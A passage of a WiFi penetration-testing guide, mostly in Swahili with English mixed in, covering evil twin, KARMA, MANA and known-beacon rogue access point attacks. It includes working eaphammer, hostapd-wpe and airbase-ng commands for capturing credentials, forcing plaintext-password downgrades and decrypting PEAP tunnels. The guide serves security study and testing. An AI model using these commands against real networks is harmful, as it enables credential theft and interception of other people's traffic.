iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Evil Twin

Shambulio la evil twin linatumia jinsi wateja wa WiFi wanavyotambua mitandao, kwa msingi kutegemea jina la mtandao (ESSID) bila kuhitaji base station (access point) kujithibitisha kwa mteja. Mambo muhimu ni pamoja na:

• Difficulty in Differentiation: Vifaa vinashindwa kutofautisha kati ya access points halali na access points isiyo halali wanaposhirikisha ESSID na aina ya usimbaji. Mitandao ya kweli mara nyingi hutumia access points kadhaa zenye ESSID sawa ili kupanua eneo la kufunika bila mshono.
• Client Roaming and Connection Manipulation: Protokoli ya 802.11 inaruhusu vifaa kuhama kati ya access points ndani ya ESS ileile. Washambuliaji wanaweza kutumia hili kwa kujaribu kuvutia kifaa kukatisha muunganisho kutoka kwenye base station yake ya sasa na kujiunga na rogue access point. Hii inaweza kufikiwa kwa kutoa ishara yenye nguvu zaidi au kuharibu muunganisho wa access point halali kwa njia kama deauthentication packets au jamming.
• Challenges in Execution: Kufanikiwa kutekeleza evil twin attack katika mazingira yenye access points nyingi zilizo pangwa vizuri kunaweza kuwa changamoto. Deauthenticating access point halali moja mara nyingi husababisha kifaa kuungana na access point halali nyingine isipokuwa washambuliaji waweze deauthenticate access points zote zilizo karibu au kuweka rogue access point kwa kimkakati.

Unaweza kuunda Open Evil Twin ya msingi sana (bila uwezo wa kusafirisha trafiki kwenda Internet) kwa kufanya:

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

Unaweza pia kuunda Evil Twin kwa kutumia eaphammer (kumbuka kwamba, ili kuunda evil twins kwa eaphammer, interface haipaswi kuwa katika monitor mode):

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Au ukitumia Airgeddon: Options: 5,6,7,8,9 (inside Evil Twin attack menu).

Tafadhali, kumbuka kwamba kwa chaguo-msingi ikiwa ESSID kwenye PNL imehifadhiwa kama WPA protected, kifaa hakitajiunganishwa moja kwa moja na Open evil Twin. Unaweza kujaribu kufanya DoS kwa AP halisi na kutegemea kwamba mtumiaji ataunganishwa kwa mikono kwenye Open evil twin yako, au unaweza kufanya DoS kwa AP halisi na kutumia WPA Evil Twin kukamata handshake (kwa kutumia mbinu hii hautaweza kumruhusu mwathirika aunganishwe kwako kwa sababu hujui PSK, lakini unaweza kukamata handshake na kujaribu ku-crack).

Some OS and AV will warn the user that connect to an Open network is dangerous...

WPA/WPA2 Evil Twin

Unaweza kuunda Evil Twin using WPA/2 na ikiwa vifaa vimewekwa kuunganishwa kwenye SSID hiyo kwa WPA/2, vitajaribu kuunganishwa. Hata hivyo, to complete the 4-way-handshake pia unahitaji know the password ambayo client ataitumia. Ikiwa don't know it, the connection won't be completed.

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Enterprise Evil Twin

Ili kuelewa mashambulizi haya, ninapendekeza usome kwanza muhtasari wa WPA Enterprise explanation.

Kutumia hostapd-wpe

hostapd-wpe inahitaji faili ya usanidi ili ifanye kazi. Ili kuotomatisha uundaji wa usanidi hizi unaweza kutumia https://github.com/WJDigby/apd_launchpad (pakua faili ya python ndani ya /etc/hostapd-wpe/)

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

Katika faili ya usanidi unaweza kuchagua vitu vingi tofauti kama ssid, channel, mafayela ya watumiaji, cret/key, dh parameters, wpa version na auth...

Kutumia hostapd-wpe na EAP-TLS ili kuruhusu cheti chochote kuingia.

Kutumia EAPHammer

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Kwa chaguo-msingi, EAPHammer hutumia authentication methods hizi (angalia GTC kama ya kwanza kujaribu kupata plaintext passwords na kisha kutumia auth methods zenye nguvu zaidi):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

Hii ndiyo mbinu ya chaguo-msingi ili kuepuka muda mrefu wa kuunganishwa. Hata hivyo, unaweza pia kutaja kwa server authentication methods kutoka dhaifu hadi imara:

--negotiate weakest

Au unaweza pia kutumia:

• --negotiate gtc-downgrade to use highly efficient GTC downgrade implementation (plaintext passwords)
• --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP to specify manually the methods offered (offering the same auth methods in the same order as the organisation the attack will be much more difficult to detect).
• Find more info in the wiki

Kutumia Airgeddon

Airgeddon inaweza kutumia vyeti vilivyotengenezwa hapo awali kutoa uthibitishaji wa EAP kwa mitandao ya WPA/WPA2-Enterprise. Mtandao bandia utapunguza itifaki ya muunganisho hadi EAP-MD5 kwa hivyo utaweza kunasa mtumiaji na MD5 ya nywila. Baadaye, mshambuliaji anaweza kujaribu kuvunja nywila.
Airggedon inakupa uwezekano wa continuous Evil Twin attack (noisy) au only create the Evil Attack until someone connects (smooth).

Ku-debug PEAP na EAP-TTLS TLS tunnels katika mashambulizi ya Evil Twins

This method was tested in an PEAP connection but as I'm decrypting an arbitrary TLS tunnel this should also works with EAP-TTLS

Ndani ya configuration ya hostapd-wpe weka mstari ambao unaeleza dh_file kama comment (kutoka dh_file=/etc/hostapd-wpe/certs/dh hadi #dh_file=/etc/hostapd-wpe/certs/dh)
Hii itafanya hostapd-wpe kubadilishana funguo kwa kutumia RSA badala ya DH, hivyo utaweza kufungua trafiki baadaye ukiwa unajua funguo binafsi za server.

Sasa anza Evil Twin ukitumia hostapd-wpe na configuration iliyorekebishwa kama kawaida. Pia, anzisha wireshark kwenye interface ambayo inafanya mashambulizi ya Evil Twin.

Sasa au baadaye (wakati tayari umenasa baadhi ya nia za uthibitishaji) unaweza kuongeza funguo binafsi ya RSA kwenye wireshark katika: Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...

Ongeza kipengee kipya na ujaze fomu na hizi thamani: IP address = any -- Port = 0 -- Protocol = data -- Key File (select your key file, to avoid problems select a key file without being password protected).

Na tazama tab mpya ya "Decrypted TLS":

KARMA, MANA, Loud MANA and Known beacons attack

ESSID and MAC black/whitelists

Aina mbalimbali za Media Access Control Filter Lists (MFACLs) na modi zao zinazolingana pamoja na athari zao kwa tabia ya rogue Access Point (AP):

1. MAC-based Whitelist:

• rogue AP itajibu tu maombi ya probe kutoka kwa vifaa vilivyotajwa kwenye whitelist, ikabaki isiyoonekana kwa wengine wote wasiopangwa.

2. MAC-based Blacklist:

• rogue AP itapuuzia maombi ya probe kutoka kwa vifaa vilivyopo kwenye blacklist, kwa ufanisi kuifanya rogue AP isionekane kwa vifaa hivyo maalum.

3. SSID-based Whitelist:

• rogue AP itajibu maombi ya probe kwa ESSIDs maalum tu zilizoorodheshwa, kuifanya isionekane kwa vifaa ambavyo Preferred Network Lists (PNLs) hazijumuishi ESSIDs hizo.

4. SSID-based Blacklist:

• rogue AP haitajibu maombi ya probe kwa ESSIDs maalum zilizo kwenye blacklist, kuifanya isionekane kwa vifaa vinavyotafuta mitandao hiyo maalum.

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

Mbinu hii inampa attacker uwezo wa kuunda malicious access point (AP) inayojibu probe requests zote kutoka kwa devices zinazotafuta kuunganishwa na networks. Teknik hii inachochea devices kujiunga na attacker's AP kwa kuiga networks ambazo devices zinatafuta. Mara device itakapotuma connection request kwa rogue AP hii, muunganisho unakamilika na device kuunganishwa kwa makosa na network ya attacker.

MANA

Kisha, devices zilianza kupuuza unsolid network responses, jambo ambalo lilipunguza ufanisi wa karma attack ya awali. Hata hivyo, mbinu mpya, inayoitwa MANA attack, ilitengenezwa na Ian de Villiers na Dominic White. Mbinu hii inahusisha rogue AP kukamata Preferred Network Lists (PNL) kutoka kwa devices kwa kujibu broadcast probe requests zao na network names (SSIDs) ambazo zariwahi kutumiwa na devices. Attack hii ya kitaalamu inavuka kinga dhidi ya karma attack ya msingi kwa kutumia jinsi devices zinavyokumbuka na kuipa kipaumbele mitandao zilizoijulikana.

MANA attack inafanya kazi kwa kufuatilia probe requests za directed na broadcast kutoka kwa devices. Kwa directed requests, inarekodi MAC address ya device na network name iliyotakiwa, ikiongeza taarifa hizi kwenye orodha. Wakati broadcast request inapopokelewa, AP inajibu kwa taarifa inayolingana na yoyote ya mitandao kwenye orodha ya device, ikiwavutia device kuungana na rogue AP.

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

A Loud MANA attack ni mkakati wa juu unaotumika wakati vifaa havitumi directed probing au wakati Preferred Network Lists (PNL) zao hazijulikani kwa mshambuliaji. Inafanya kazi kwa kanuni kwamba vifaa katika eneo sawa kuna uwezekano mkubwa wa kushirikiana baadhi ya majina ya mtandao katika PNL zao. Badala ya kujibu kwa uteuzi, shambulio hili hutangaza probe responses kwa kila jina la mtandao (ESSID) linalopatikana katika PNL zilizojumuishwa za vifaa vyote vilivyochunguzwa. Njia hii pana inaboresha nafasi ya kifaa kutambua mtandao wa kawaida na kujaribu kuungana na rogue Access Point (AP).

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Known Beacon attack

Wakati Loud MANA attack inaweza kukosa kutosha, Known Beacon attack inatoa mbinu nyingine. Njia hii brute-forces the connection process by simulating an AP that responds to any network name, cycling through a list of potential ESSIDs zinazotokana na wordlist. Hii inaiga uwepo wa mitandao mingi, ikitarajia kupatana na ESSID ndani ya PNL ya mwathiriwa, na kusababisha jaribio la kuunganishwa kwa AP bandia. Shambulio linaweza kuimarishwa kwa kuunganisha na chaguo la --loud kwa jaribio kali zaidi la kuwakamata vifaa.

Eaphammer ilitekeleza shambulio hili kama MANA attack ambapo ESSIDs zote ndani ya orodha zinatumwa (pia unaweza kuunganisha hili na --loud ili kuunda Loud MANA + Known beacons attack):

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Known Beacon Burst attack

Shambulio la Known Beacon Burst attack linahusisha rapid-fire broadcasting of beacon frames for each ESSID listed in a file. Hii inaumba mazingira mazito ya mitandao bandia, ikiongeza sana uwezekano wa vifaa kuunganishwa na rogue AP, hasa wakati inapoambatana na MANA attack. Mbinu hii inatumia kasi na wingi kuvuruga mifumo ya uchaguzi wa mtandao ya vifaa.

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Wi-Fi Direct

Wi-Fi Direct ni itifaki inayowezesha vifaa kuungana moja kwa moja kwa kila mmoja kwa kutumia Wi-Fi bila hitaji la access point ya wireless ya jadi. Uwezo huu umejengewa ndani ya vifaa mbalimbali vya Internet of Things (IoT), kama printers na televisions, ukirahisisha mawasiliano ya moja kwa moja kati ya vifaa. Sifa muhimu ya Wi-Fi Direct ni kwamba kifaa kimoja huchukua nafasi ya access point, kinachojulikana kama group owner, kusimamia muunganisho.

Usalama wa muunganisho wa Wi-Fi Direct unaanzishwa kupitia Wi-Fi Protected Setup (WPS), ambayo inaunga mkono mbinu kadhaa za kuoanisha kwa usalama, zikiwemo:

• Push-Button Configuration (PBC)
• PIN entry
• Near-Field Communication (NFC)

Mbinu hizi, hasa PIN entry, zinakabiliwa na mapungufu sawa na WPS katika mitandao ya Wi-Fi ya kawaida, na hivyo kuzifanya kuwa malengo ya vigezo vya mashambulizi vinavyofanana.

EvilDirect Hijacking

EvilDirect Hijacking ni shambulio maalumu kwa Wi-Fi Direct. Linafanana na dhana ya Evil Twin attack lakini linalenga muunganisho wa Wi-Fi Direct. Katika tukio hili, mshambulizi anajifanya kuwa group owner halali kwa lengo la kuwadanganya vifaa kuungana na entiti yenye nia mbaya. Njia hii inaweza kutekelezwa kwa kutumia zana kama airbase-ng kwa kubainisha channel, ESSID, na MAC address ya kifaa kinachofanyiwa uigaji:

References

• https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
• https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9
• https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38
• https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d
• https://github.com/gdssecurity/Whitepapers/blob/master/GDS%20Labs%20-%20Identifying%20Rogue%20Access%20Point%20Attacks%20Using%20Probe%20Response%20Patterns%20and%20Signal%20Strength.pdf
• http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/
• https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
• https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d
• https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)
• https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
• The vulnerability that killed FreeWifi_Secure
• RFC 4186 – EAP-SIM Authentication
• 3GPP TS 33.402 – 3GPP system architecture evolution (SAE); Security aspects of non-3GPP accesses

TODO: Angalia https://github.com/wifiphisher/wifiphisher (login na facebook na uigaji wa WPA katika captive portals)